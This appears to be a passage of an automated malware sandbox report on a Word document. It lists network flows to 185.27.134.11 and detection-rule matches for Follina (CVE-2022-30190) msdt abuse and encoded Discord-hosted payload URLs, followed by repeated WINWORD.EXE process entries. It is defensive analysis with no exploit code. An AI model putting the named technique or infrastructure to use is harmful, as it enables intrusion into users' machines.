Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49181 -> 185.27.134.11:18657 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:18657 -> 192.168.2.22:49181 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49183 |
Source: global traffic |
TCP traffic: 192.168.2.22:49183 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49184 -> 185.27.134.11:30008 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:30008 -> 192.168.2.22:49184 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49186 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 192.168.2.22:49186 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49180 |
Source: global traffic |
TCP traffic: 192.168.2.22:49180 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: global traffic |
TCP traffic: 185.27.134.11:21 -> 192.168.2.22:49179 |
Source: global traffic |
TCP traffic: 192.168.2.22:49179 -> 185.27.134.11:21 |
Source: dump.pcap, type: PCAP |
Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research |
Source: dump.pcap, type: PCAP |
Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08 |
Source: dump.pcap, type: PCAP |
Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18 |
Source: document.xml.rels, type: SAMPLE |
Matched rule: SUSP_Doc_WordXMLRels_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED |
Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED |
Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED |
Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED |
Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED |
Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\a[1].html, type: DROPPED |
Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED |
Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED |
Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16ADE517.html, type: DROPPED |
Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED |
Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), score = , reference = Internal Research |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED |
Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CF5ACC2C.html, type: DROPPED |
Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, score = , reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18 |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
